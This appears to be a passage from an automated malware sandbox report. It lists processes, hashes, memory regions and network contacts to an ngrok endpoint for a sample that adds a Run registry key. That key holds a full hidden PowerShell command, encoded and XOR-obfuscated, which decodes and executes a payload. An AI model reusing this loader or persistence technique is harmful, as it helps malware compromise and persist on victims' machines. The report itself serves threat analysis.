WABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
"C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.tcp.eu.ngrok.io | udp |
| DE | 18.198.77.177:2024 | 4.tcp.eu.ngrok.io | tcp |
Files
memory/2372-0-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2372-1-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2572-6-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/2572-7-0x0000000001F60000-0x0000000001F68000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9df5ee3447038ee28808dabdc7e97ec0 |
| SHA1 | f464a8ba5c957a25de36760014bc752d5ae40b08 |
| SHA256 | c0a444a016a834136ac90be99039ba5af759256f2c32b74c0ce544459e59a321 |
| SHA512 | 453906ac10176c3e9a6e60b0b5d9e8f99cc0212259b9790e171b5d66f809b0feaab9a013b603c4ef9f6ea6a78efacdf57226b64ea2916df4a0839f587e1c504f |
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
| MD5 | af59d42f6526cfabf0f502f8e83209f9 |
| SHA1 | 6505f4560261dedfae55dc4a5b712802ffb2eed6 |
| SHA256 | f1a47699ad8f48d7cf68f5db51364433ac8695cc6d2149d26dbf20b9af31bf4f |
| SHA512 | f3fc5ee9df8454ee8abce013a1672fdf01c5a5d08d88e6221c169d3a31d43dbaf50e7bdbbe54e8bb8453f5367d12f016cb834ec6efed363c8f8018cd11e4a646 |
memory/2856-19-0x0000000000AC0000-0x0000000000AD2000-memory.dmp
memory/868-20-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/868-21-0x0000000140000000-0x00000001405E8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-07 21:54
Reported
2024-11-07 21:55
Platform
win10v2004-20241007-en
Max time kernel
2s
Max time network
4s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=" | C:\Windows\regedit.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Processes
C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |